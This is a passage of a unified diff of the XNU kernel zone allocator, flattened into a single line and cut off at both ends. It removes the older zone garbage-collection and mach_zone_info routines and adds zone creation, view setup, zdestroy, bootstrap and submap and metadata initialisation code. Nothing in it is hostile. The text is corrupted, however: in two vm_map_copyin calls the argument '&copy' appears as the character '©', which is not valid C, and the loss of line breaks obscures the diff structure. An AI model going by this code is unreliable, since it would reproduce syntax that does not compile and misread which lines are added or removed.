z->z_free_zeroes = true; } - zfree_direct_locked(zone, elem, poison); - - unlock_zone(zone); -} - -void -(zfree)(union zone_or_view zov, void *addr) -{ - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(!zone->percpu); - zfree_ext(zone, zstats, addr); -} - -void -zfree_percpu(union zone_or_view zov, void *addr) -{ - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(zone->percpu); - zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr)); -} - -#pragma mark vm integration, MIG routines - -/* - * Drops (i.e. frees) the elements in the all free pages queue of a zone. - * Called by zone_gc() on each zone and when a zone is zdestroy()ed. - */ -static void -zone_drop_free_elements(zone_t z) -{ - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - unsigned int total_freed_pages = 0; - struct zone_page_metadata *page_meta, *seq_meta; - vm_address_t page_addr; - vm_size_t size_to_free; - vm_size_t free_count; - uint32_t page_count; - - current_thread()->options |= TH_OPT_ZONE_PRIV; - lock_zone(z); - - while (!zone_pva_is_null(z->pages_all_free)) { + if ((flags & ZC_CACHING) && !z->z_nocaching) { /* - * If any replenishment threads are running, defer to them, - * so that we don't deplete reserved zones. + * If zcache hasn't been initialized yet, remember our decision, * - * The timing of the check isn't super important, as there are - * enough reserves to allow freeing an extra page_meta. - * - * Hence, we can check without grabbing the lock every time - * through the loop. We do need the lock however to avoid - * missing a wakeup when we decide to block. - */ - if (zone_replenish_active > 0) { - lck_spin_lock(&zone_replenish_lock); - if (zone_replenish_active > 0) { - assert_wait(&zone_replenish_active, THREAD_UNINT); - lck_spin_unlock(&zone_replenish_lock); - unlock_zone(z); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(z); - continue; - } - lck_spin_unlock(&zone_replenish_lock); - } - - page_meta = zone_pva_to_meta(z->pages_all_free, kind); - page_count = page_meta->zm_page_count; - free_count = zone_elem_count(z, ptoa(page_count), kind); - - /* - * Don't drain zones with async refill to below the refill - * threshold, as they need some reserve to function properly. + * zone_enable_caching() will be called again by + * zcache_bootstrap(), while the system is still single + * threaded, to build the missing caches. */ - if (!z->destroyed && z->prio_refill_count && - (vm_size_t)(z->countfree - free_count) < z->prio_refill_count) { - break; - } - - zone_meta_queue_pop(z, &z->pages_all_free, kind, &page_addr); - - if (os_sub_overflow(z->countfree, free_count, &z->countfree)) { - zone_accounting_panic(z, "countfree wrap-around"); - } - if (os_sub_overflow(z->countavail, free_count, &z->countavail)) { - zone_accounting_panic(z, "countavail wrap-around"); - } - if (os_sub_overflow(z->allfree_page_count, page_count, - &z->allfree_page_count)) { - zone_accounting_panic(z, "allfree_page_count wrap-around"); - } - if (os_sub_overflow(z->page_count, page_count, &z->page_count)) { - zone_accounting_panic(z, "page_count wrap-around"); - } - - os_atomic_sub(&zones_phys_page_count, page_count, relaxed); - os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed); - - bzero(page_meta, sizeof(*page_meta) * page_count); - seq_meta = page_meta; - page_meta = NULL; /* page_meta fields are zeroed, prevent reuse */ - - unlock_zone(z); - - /* Free the pages for metadata and account for them */ - total_freed_pages += page_count; - size_to_free = ptoa(page_count); -#if KASAN_ZALLOC - kasan_poison_range(page_addr, size_to_free, ASAN_VALID); -#endif -#if VM_MAX_TAG_ZONES - if (z->tags) { - ztMemoryRemove(z, page_addr, size_to_free); - } -#endif /* VM_MAX_TAG_ZONES */ - - if (z->va_sequester && z->alloc_pages == page_count) { - kernel_memory_depopulate(submap_for_zone(z), page_addr, - size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE); + if (__probable(zc_magazine_zone)) { + zone_enable_caching(z); } else { - kmem_free(submap_for_zone(z), page_addr, size_to_free); - seq_meta = NULL; + z->z_pcpu_cache = + __zpcpu_mangle_for_boot(&zone_cache_startup[zid]); } - thread_yield_to_preemption(); - - lock_zone(z); - - if (seq_meta) { - zone_meta_queue_push(z, &z->pages_sequester, seq_meta, kind); - z->sequester_page_count += page_count; - } - } - if (z->destroyed) { - assert(zone_pva_is_null(z->pages_all_free)); - assert(z->allfree_page_count == 0); - } - unlock_zone(z); - current_thread()->options &= ~TH_OPT_ZONE_PRIV; - -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) { - kprintf("zone_gc() of zone %s%s freed %lu elements, %d pages\n", - zone_heap_name(z), z->z_name, - (unsigned long)(ptoa(total_freed_pages) / z->pcpu_elem_size), - total_freed_pages); - } -#endif /* DEBUG || DEVELOPMENT */ -} - -/* Zone garbage collection - * - * zone_gc will walk through all the free elements in all the - * zones that are marked collectable looking for reclaimable - * pages. zone_gc is called by consider_zone_gc when the system - * begins to run out of memory. - * - * We should ensure that zone_gc never blocks. - */ -void -zone_gc(boolean_t consider_jetsams) -{ - if (consider_jetsams) { - kill_process_in_largest_zone(); - /* - * If we do end up jetsamming something, we need to do a zone_gc so that - * we can reclaim free zone elements and update the zone map size. - * Fall through. - */ } - lck_mtx_lock(&zone_gc_lock); - -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) { - kprintf("zone_gc() starting...\n"); - } -#endif /* DEBUG || DEVELOPMENT */ - - zone_index_foreach(i) { - zone_t z = &zone_array[i]; - - if (!z->collectable) { - continue; - } -#if CONFIG_ZCACHE - if (zone_caching_enabled(z)) { - zcache_drain_depot(z); - } -#endif /* CONFIG_ZCACHE */ - if (zone_pva_is_null(z->pages_all_free)) { - continue; + if (zp_factor != 0 && !z->z_free_zeroes) { + if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { + zpercpu_foreach(zs, z->z_stats) { + zs->zs_poison_seqno = zone_poison_count_init(z); + } + } else { + zone_stats_startup[zid].zs_poison_seqno = + zone_poison_count_init(z); } - - zone_drop_free_elements(z); } - lck_mtx_unlock(&zone_gc_lock); -} + zone_lock(z); + z->z_self = z; + zone_unlock(z); -/* - * consider_zone_gc: - * - * Called by the pageout daemon when the system needs more free pages. - */ + return z; +} +__startup_func void -consider_zone_gc(boolean_t consider_jetsams) +zone_create_startup(struct zone_create_startup_spec *spec) { - /* - * One-time reclaim of kernel_map resources we allocated in - * early boot. - * - * Use atomic exchange in case multiple threads race into here. - */ - vm_offset_t deallocate_kaddr; - if (kmapoff_kaddr != 0 && - (deallocate_kaddr = os_atomic_xchg(&kmapoff_kaddr, 0, relaxed)) != 0) { - vm_deallocate(kernel_map, deallocate_kaddr, ptoa_64(kmapoff_pgcnt)); - } - - zone_gc(consider_jetsams); + *spec->z_var = zone_create_ext(spec->z_name, spec->z_size, + spec->z_flags, spec->z_zid, spec->z_setup); } /* - * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls - * requesting zone information. - * Frees unused pages towards the end of the region, and zero'es out unused - * space on the last page. + * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t + * union works. trust but verify. */ -static vm_map_copy_t -create_vm_map_copy( - vm_offset_t start_addr, - vm_size_t total_size, - vm_size_t used_size) -{ - kern_return_t kr; - vm_offset_t end_addr; - vm_size_t free_size; - vm_map_copy_t copy; - - if (used_size != total_size) { - end_addr = start_addr + used_size; - free_size = total_size - (round_page(end_addr) - start_addr); - - if (free_size >= PAGE_SIZE) { - kmem_free(ipc_kernel_map, - round_page(end_addr), free_size); - } - bzero((char *) end_addr, round_page(end_addr) - end_addr); - } - - kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr, - (vm_map_size_t)used_size, TRUE, ©); - assert(kr == KERN_SUCCESS); - - return copy; -} +#define zalloc_check_zov_alias(f1, f2) \ + static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2)) +zalloc_check_zov_alias(z_self, zv_zone); +zalloc_check_zov_alias(z_stats, zv_stats); +zalloc_check_zov_alias(z_name, zv_name); +zalloc_check_zov_alias(z_views, zv_next); +#undef zalloc_check_zov_alias -static boolean_t -get_zone_info( - zone_t z, - mach_zone_name_t *zn, - mach_zone_info_t *zi) +__startup_func +void +zone_view_startup_init(struct zone_view_startup_spec *spec) { - struct zone zcopy; + struct kalloc_heap *heap = NULL; + zone_view_t zv = spec->zv_view; + zone_t z; - assert(z != ZONE_NULL); - lock_zone(z); - if (!z->z_self) { - unlock_zone(z); - return FALSE; + switch (spec->zv_heapid) { + case KHEAP_ID_DEFAULT: + heap = KHEAP_DEFAULT; + break; + case KHEAP_ID_DATA_BUFFERS: + heap = KHEAP_DATA_BUFFERS; + break; + case KHEAP_ID_KEXT: + heap = KHEAP_KEXT; + break; + default: + heap = NULL; } - zcopy = *z; - unlock_zone(z); - - if (zn != NULL) { - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); - /* assuming here the name data is static */ - (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name, - strlen(temp_zone_name) + 1); + if (heap) { + z = kalloc_heap_zone_for_size(heap, spec->zv_size); + assert(z); + } else { + z = spec->zv_zone; + assert(spec->zv_size <= zone_elem_size(z)); } - if (zi != NULL) { - *zi = (mach_zone_info_t) { - .mzi_count = zone_count_allocated(&zcopy), - .mzi_cur_size = ptoa_64(zcopy.page_count), - // max_size for zprint is now high-watermark of pages used - .mzi_max_size = ptoa_64(zcopy.page_count_hwm), - .mzi_elem_size = zcopy.pcpu_elem_size, - .mzi_alloc_size = ptoa_64(zcopy.alloc_pages), - .mzi_exhaustible = (uint64_t)zcopy.exhaustible, - }; - zpercpu_foreach(zs, zcopy.z_stats) { - zi->mzi_sum_size += zs->zs_mem_allocated; - } - if (zcopy.collectable) { - SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable, - ptoa_64(zcopy.allfree_page_count)); - SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE); - } + zv->zv_zone = z; + zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats); + zv->zv_next = z->z_views; + if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) { + /* + * count the raw view for zones not in a heap, + * kalloc_heap_init() already counts it for its members. + */ + zone_view_count += 2; + } else { + zone_view_count += 1; } - - return TRUE; + z->z_views = zv; } -kern_return_t -task_zone_info( - __unused task_t task, - __unused mach_zone_name_array_t *namesp, - __unused mach_msg_type_number_t *namesCntp, - __unused task_zone_info_array_t *infop, - __unused mach_msg_type_number_t *infoCntp) +zone_t +zone_create( + const char *name, + vm_size_t size, + zone_create_flags_t flags) { - return KERN_FAILURE; + return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL); } -kern_return_t -mach_zone_info( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp, - mach_zone_info_array_t *infop, - mach_msg_type_number_t *infoCntp) +zone_t +zinit( + vm_size_t size, /* the size of an element */ + vm_size_t max, /* maximum memory to use */ + vm_size_t alloc __unused, /* allocation size */ + const char *name) /* a name for the zone */ { - return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL); + zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE); + z->z_wired_max = zone_alloc_pages_for_nelems(z, max / size); + return z; } - -kern_return_t -mach_memory_info( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp, - mach_zone_info_array_t *infop, - mach_msg_type_number_t *infoCntp, - mach_memory_info_array_t *memoryInfop, - mach_msg_type_number_t *memoryInfoCntp) +void +zdestroy(zone_t z) { - mach_zone_name_t *names; - vm_offset_t names_addr; - vm_size_t names_size; - - mach_zone_info_t *info; - vm_offset_t info_addr; - vm_size_t info_size; + unsigned int zindex = zone_index(z); - mach_memory_info_t *memory_info; - vm_offset_t memory_info_addr; - vm_size_t memory_info_size; - vm_size_t memory_info_vmsize; - unsigned int num_info; + current_thread()->options |= TH_OPT_ZONE_PRIV; + lck_mtx_lock(&zone_gc_lock); - unsigned int max_zones, used_zones, i; - mach_zone_name_t *zn; - mach_zone_info_t *zi; - kern_return_t kr; + zone_reclaim(z, ZONE_RECLAIM_DESTROY); - uint64_t zones_collectable_bytes = 0; + lck_mtx_unlock(&zone_gc_lock); + current_thread()->options &= ~TH_OPT_ZONE_PRIV; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; +#if CONFIG_GZALLOC + if (__improbable(z->gzalloc_tracked)) { + /* If the zone is gzalloc managed dump all the elements in the free cache */ + gzalloc_empty_free_cache(z); } #endif - /* - * We assume that zones aren't freed once allocated. - * We won't pick up any zones that are allocated later. - */ + zone_lock(z); - max_zones = os_atomic_load(&num_zones, relaxed); + while (!zone_pva_is_null(z->z_pageq_va)) { + struct zone_page_metadata *meta; + vm_offset_t free_addr; - names_size = round_page(max_zones * sizeof *names); - kr = kmem_alloc_pageable(ipc_kernel_map, - &names_addr, names_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; + zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages); + meta = zone_meta_queue_pop_native(z, &z->z_pageq_va, &free_addr); + assert(meta->zm_chunk_len <= ZM_CHUNK_LEN_MAX); + bzero(meta, sizeof(*meta) * z->z_chunk_pages); + zone_unlock(z); + kmem_free(zone_submap(z), free_addr, ptoa(z->z_chunk_pages)); + zone_lock(z); } - names = (mach_zone_name_t *) names_addr; - info_size = round_page(max_zones * sizeof *info); - kr = kmem_alloc_pageable(ipc_kernel_map, - &info_addr, info_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - kmem_free(ipc_kernel_map, - names_addr, names_size); - return kr; +#if !KASAN_ZALLOC + /* Assert that all counts are zero */ + if (z->z_elems_avail || z->z_elems_free || + zone_size_wired(z) || z->z_va_cur) { + panic("zdestroy: Zone %s%s isn't empty at zdestroy() time", + zone_heap_name(z), z->z_name); } - info = (mach_zone_info_t *) info_addr; - zn = &names[0]; - zi = &info[0]; + /* consistency check: make sure everything is indeed empty */ + assert(zone_pva_is_null(z->z_pageq_empty)); + assert(zone_pva_is_null(z->z_pageq_partial)); + assert(zone_pva_is_null(z->z_pageq_full)); + assert(zone_pva_is_null(z->z_pageq_va)); +#endif - used_zones = max_zones; - for (i = 0; i < max_zones; i++) { - if (!get_zone_info(&(zone_array[i]), zn, zi)) { - used_zones--; - continue; - } - zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable); - zn++; - zi++; - } + zone_unlock(z); - *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names); - *namesCntp = used_zones; + simple_lock(&all_zones_lock, &zone_locks_grp); - *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info); - *infoCntp = used_zones; + assert(!bitmap_test(zone_destroyed_bitmap, zindex)); + /* Mark the zone as empty in the bitmap */ + bitmap_set(zone_destroyed_bitmap, zindex); + num_zones_in_use--; + assert(num_zones_in_use > 0); - num_info = 0; - memory_info_addr = 0; + simple_unlock(&all_zones_lock); +} - if (memoryInfop && memoryInfoCntp) { - vm_map_copy_t copy; - num_info = vm_page_diagnose_estimate(); - memory_info_size = num_info * sizeof(*memory_info); - memory_info_vmsize = round_page(memory_info_size); - kr = kmem_alloc_pageable(ipc_kernel_map, - &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; - } +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc module init +#if !ZALLOC_TEST - kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, - VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); - assert(kr == KERN_SUCCESS); +/* + * Initialize the "zone of zones" which uses fixed memory allocated + * earlier in memory initialization. zone_bootstrap is called + * before zone_init. + */ +__startup_func +void +zone_bootstrap(void) +{ + /* Validate struct zone_packed_virtual_address expectations */ + static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1"); + if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) { + panic("zone_pva_t can't pack a kernel page address in 31 bits"); + } - memory_info = (mach_memory_info_t *) memory_info_addr; - vm_page_diagnose(memory_info, num_info, zones_collectable_bytes); + zpercpu_early_count = ml_early_cpu_max_number() + 1; - kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE); - assert(kr == KERN_SUCCESS); + /* Set up zone element poisoning */ + zp_bootstrap(); - kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr, - (vm_map_size_t)memory_info_size, TRUE, ©); - assert(kr == KERN_SUCCESS); + /* + * the KASAN quarantine for kalloc doesn't understand heaps + * and trips the heap confusion panics. At the end of the day, + * all these security measures are double duty with KASAN. + * + * On 32bit kernels, these protections are just too expensive. + */ +#if !defined(__LP64__) || KASAN_ZALLOC + zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER; + zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA; + zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC; +#endif - *memoryInfop = (mach_memory_info_t *) copy; - *memoryInfoCntp = num_info; - } + thread_call_setup_with_options(&zone_expand_callout, + zone_expand_async, NULL, THREAD_CALL_PRIORITY_HIGH, + THREAD_CALL_OPTIONS_ONCE); + + thread_call_setup_with_options(&zone_defrag_callout, + zone_defrag_async, NULL, THREAD_CALL_PRIORITY_USER, + THREAD_CALL_OPTIONS_ONCE); +} + +#if __LP64__ +#if ARM_LARGE_MEMORY || __x86_64__ +#define ZONE_MAP_VIRTUAL_SIZE_LP64 (128ULL * 1024ULL * 1024 * 1024) +#else +#define ZONE_MAP_VIRTUAL_SIZE_LP64 (32ULL * 1024ULL * 1024 * 1024) +#endif +#endif /* __LP64__ */ - return KERN_SUCCESS; -} +#define ZONE_GUARD_SIZE (64UL << 10) -kern_return_t -mach_zone_info_for_zone( - host_priv_t host, - mach_zone_name_t name, - mach_zone_info_t *infop) +#if __LP64__ +static inline vm_offset_t +zone_restricted_va_max(void) { - zone_t zone_ptr; + vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR); + vm_offset_t vm_page_max = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR); - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; - } + return trunc_page(MIN(compressor_max, vm_page_max)); +} #endif - if (infop == NULL) { - return KERN_INVALID_ARGUMENT; +__startup_func +static void +zone_tunables_fixup(void) +{ + if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) { + zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT; } + if (zc_magazine_size > PAGE_SIZE / ZONE_MIN_ELEM_SIZE) { + zc_magazine_size = (uint16_t)(PAGE_SIZE / ZONE_MIN_ELEM_SIZE); + } +} +STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup); - zone_ptr = ZONE_NULL; - zone_index_foreach(i) { - zone_t z = &(zone_array[i]); - assert(z != ZONE_NULL); - - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); +__startup_func +static vm_size_t +zone_phys_size_max(void) +{ + vm_size_t zsize; + vm_size_t zsizearg; - /* Find the requested zone by name */ - if (track_this_zone(temp_zone_name, name.mzn_name)) { - zone_ptr = z; - break; - } + if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) { + zsize = zsizearg * (1024ULL * 1024); + } else { + /* Set target zone size as 1/4 of physical memory */ + zsize = (vm_size_t)(sane_size >> 2); +#if defined(__LP64__) + zsize += zsize >> 1; +#endif /* __LP64__ */ } - /* No zones found with the requested zone name */ - if (zone_ptr == ZONE_NULL) { - return KERN_INVALID_ARGUMENT; + if (zsize < CONFIG_ZONE_MAP_MIN) { + zsize = CONFIG_ZONE_MAP_MIN; /* Clamp to min */ } - - if (get_zone_info(zone_ptr, NULL, infop)) { - return KERN_SUCCESS; + if (zsize > sane_size >> 1) { + zsize = (vm_size_t)(sane_size >> 1); /* Clamp to half of RAM max */ } - return KERN_FAILURE; + if (zsizearg == 0 && zsize > ZONE_MAP_MAX) { + /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */ + printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n", + (uintptr_t)zsize, (uintptr_t)ZONE_MAP_MAX); + zsize = ZONE_MAP_MAX; + } + + return (vm_size_t)trunc_page(zsize); } -kern_return_t -mach_zone_info_for_largest_zone( - host_priv_t host, - mach_zone_name_t *namep, - mach_zone_info_t *infop) +__options_decl(zone_init_allocate_flags_t, unsigned, { + ZIA_NONE = 0x00000000, + ZIA_REPLACE = 0x00000001, /* replace a previous non permanent range */ + ZIA_RANDOM = 0x00000002, /* place at a random address */ + ZIA_PERMANENT = 0x00000004, /* permanent allocation */ + ZIA_GUARD = 0x00000008, /* will be used as a guard */ +}); + +__startup_func +static struct zone_map_range +zone_init_allocate_va(vm_map_address_t addr, vm_size_t size, + zone_init_allocate_flags_t flags) { - if (host == HOST_NULL) { - return KERN_INVALID_HOST; + vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + int vm_alloc_flags = 0; + struct zone_map_range r; + kern_return_t kr; + + if (flags & ZIA_REPLACE) { + vm_alloc_flags |= VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE; + } else { + vm_alloc_flags |= VM_FLAGS_ANYWHERE; } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; + if (flags & ZIA_RANDOM) { + vm_alloc_flags |= VM_FLAGS_RANDOM_ADDR; } -#endif - - if (namep == NULL || infop == NULL) { - return KERN_INVALID_ARGUMENT; + if (flags & ZIA_PERMANENT) { + vmk_flags.vmkf_permanent = true; } - if (get_zone_info(zone_find_largest(), namep, infop)) { - return KERN_SUCCESS; - } - return KERN_FAILURE; -} + vm_object_reference(kernel_object); -uint64_t -get_zones_collectable_bytes(void) -{ - uint64_t zones_collectable_bytes = 0; - mach_zone_info_t zi; + kr = vm_map_enter(kernel_map, &addr, size, 0, + vm_alloc_flags, vmk_flags, VM_KERN_MEMORY_ZONE, + kernel_object, 0, FALSE, + (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT, + (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT, + VM_INHERIT_NONE); - zone_index_foreach(i) { - if (get_zone_info(&zone_array[i], NULL, &zi)) { - zones_collectable_bytes += - GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable); - } + if (KERN_SUCCESS != kr) { + panic("vm_map_enter(0x%zx) failed: %d", (size_t)size, kr); } - return zones_collectable_bytes; + r.min_address = (vm_offset_t)addr; + r.max_address = (vm_offset_t)addr + size; + return r; } -kern_return_t -mach_zone_get_zlog_zones( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp) +__startup_func +static void +zone_submap_init( + vm_offset_t *submap_min, + unsigned idx, + uint64_t zone_sub_map_numer, + uint64_t *remaining_denom, + vm_offset_t *remaining_size, + vm_size_t guard_size) { -#if ZONE_ENABLE_LOGGING - unsigned int max_zones, logged_zones, i; + vm_offset_t submap_start, submap_end; + vm_size_t submap_size; + vm_map_t submap; kern_return_t kr; - zone_t zone_ptr; - mach_zone_name_t *names; - vm_offset_t names_addr; - vm_size_t names_size; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + submap_size = trunc_page(zone_sub_map_numer * *remaining_size / + *remaining_denom); + submap_start = *submap_min; + submap_end = submap_start + submap_size; - if (namesp == NULL || namesCntp == NULL) { - return KERN_INVALID_ARGUMENT; - } +#if defined(__LP64__) + if (idx == Z_SUBMAP_IDX_VA_RESTRICTED) { + vm_offset_t restricted_va_max = zone_restricted_va_max(); + if (submap_end > restricted_va_max) { +#if DEBUG || DEVELOPMENT + printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx, + (size_t)(restricted_va_max - submap_start) >> 20, + (size_t)submap_size >> 20); +#endif /* DEBUG || DEVELOPMENT */ + guard_size += submap_end - restricted_va_max; + *remaining_size -= submap_end - restricted_va_max; + submap_end = restricted_va_max; + submap_size = restricted_va_max - submap_start; + } - max_zones = os_atomic_load(&num_zones, relaxed); + vm_packing_verify_range("vm_compressor", + submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR)); + vm_packing_verify_range("vm_page", + submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR)); + } +#endif /* defined(__LP64__) */ - names_size = round_page(max_zones * sizeof *names); - kr = kmem_alloc_pageable(ipc_kernel_map, - &names_addr, names_size, VM_KERN_MEMORY_IPC); + vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + kr = kmem_suballoc(kernel_map, submap_min, submap_size, + FALSE, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, vmk_flags, + VM_KERN_MEMORY_ZONE, &submap); if (kr != KERN_SUCCESS) { - return kr; + panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d", + idx, (void *)submap_start, (void *)submap_end, kr); } - names = (mach_zone_name_t *) names_addr; - zone_ptr = ZONE_NULL; - logged_zones = 0; - for (i = 0; i < max_zones; i++) { - zone_t z = &(zone_array[i]); - assert(z != ZONE_NULL); +#if DEBUG || DEVELOPMENT + printf("zone_init: submap[%d] %p:%p (%zuM)\n", + idx, (void *)submap_start, (void *)submap_end, + (size_t)submap_size >> 20); +#endif /* DEBUG || DEVELOPMENT */ - /* Copy out the zone name if zone logging is enabled */ - if (z->zlog_btlog) { - get_zone_info(z, &names[logged_zones], NULL); - logged_zones++; - } + zone_init_allocate_va(submap_end, guard_size, + ZIA_PERMANENT | ZIA_GUARD | ZIA_REPLACE); + + zone_submaps[idx] = submap; + *submap_min = submap_end + guard_size; + *remaining_size -= submap_size; + *remaining_denom -= zone_sub_map_numer; +} + +/* + * Allocate metadata array and migrate foreign initial metadata. + * + * So that foreign pages and native pages have the same scheme, + * we allocate VA space that covers both foreign and native pages. + */ +__startup_func +static void +zone_metadata_init(void) +{ + struct zone_map_range r0 = zone_info.zi_map_range[0]; + struct zone_map_range r1 = zone_info.zi_map_range[1]; + struct zone_map_range mr, br; + vm_size_t meta_size, bits_size, foreign_base; + vm_offset_t hstart, hend; + + if (r0.min_address > r1.min_address) { + r0 = zone_info.zi_map_range[1]; + r1 = zone_info.zi_map_range[0]; } - *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names); - *namesCntp = logged_zones; + meta_size = round_page(atop(r1.max_address - r0.min_address) * + sizeof(struct zone_page_metadata)) + ZONE_GUARD_SIZE * 2; - return KERN_SUCCESS; + /* + * Allocations can't be smaller than 8 bytes, which is 128b / 16B per 1k + * of physical memory (16M per 1G). + * + * Let's preallocate for the worst to avoid weird panics. + */ + bits_size = round_page(16 * (ptoa(zone_phys_mapped_max_pages) >> 10)); -#else /* ZONE_ENABLE_LOGGING */ -#pragma unused(host, namesp, namesCntp) - return KERN_FAILURE; -#endif /* ZONE_ENABLE_LOGGING */ -} + /* + * Compute the size of the "hole" in the middle of the range. + * + * If it is smaller than 256k, just leave it be, with this layout: + * + * [G][ r0 meta ][ hole ][ r1 meta ][ bits ][G] + * + * else punch a hole with guard pages around the hole, and place the + * bits in the hole if it fits, or after r1 otherwise, yielding either + * of the following layouts: + * + * |__________________hend____________| + * |__hstart_| | + * [G][ r0 meta ][ bits ][G]..........[G][ r1 meta ][G] + * [G][ r0 meta ][G]..................[G][ r1 meta ][ bits ][G] + */ + hstart = round_page(atop(r0.max_address - r0.min_address) * + sizeof(struct zone_page_metadata)); + hend = trunc_page(atop(r1.min_address - r0.min_address) * + sizeof(struct zone_page_metadata)); + + if (hstart >= hend || hend - hstart < (256ul << 10)) { + mr = zone_init_allocate_va(0, meta_size + bits_size, + ZIA_PERMANENT | ZIA_RANDOM); + mr.min_address += ZONE_GUARD_SIZE; + mr.max_address -= ZONE_GUARD_SIZE; + br.max_address = mr.max_address; + mr.max_address -= bits_size; + br.min_address = mr.max_address; -kern_return_t -mach_zone_get_btlog_records( - host_priv_t host, - mach_zone_name_t name, - zone_btrecord_array_t *recsp, - mach_msg_type_number_t *recsCntp) -{ #if DEBUG || DEVELOPMENT - unsigned int numrecs = 0; - zone_btrecord_t *recs; - kern_return_t kr; - zone_t zone_ptr; - vm_offset_t recs_addr; - vm_size_t recs_size; + printf("zone_init: metadata %p:%p (%zuK)\n", + (void *)mr.min_address, (void *)mr.max_address, + (size_t)zone_range_size(&mr) >> 10); + printf("zone_init: metabits %p:%p (%zuK)\n", + (void *)br.min_address, (void *)br.max_address, + (size_t)zone_range_size(&br) >> 10); +#endif /* DEBUG || DEVELOPMENT */ + } else { + vm_size_t size, alloc_size = meta_size; + vm_offset_t base; + bool bits_in_middle = true; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + if (hend - hstart - 2 * ZONE_GUARD_SIZE < bits_size) { + alloc_size += bits_size; + bits_in_middle = false; + } - if (recsp 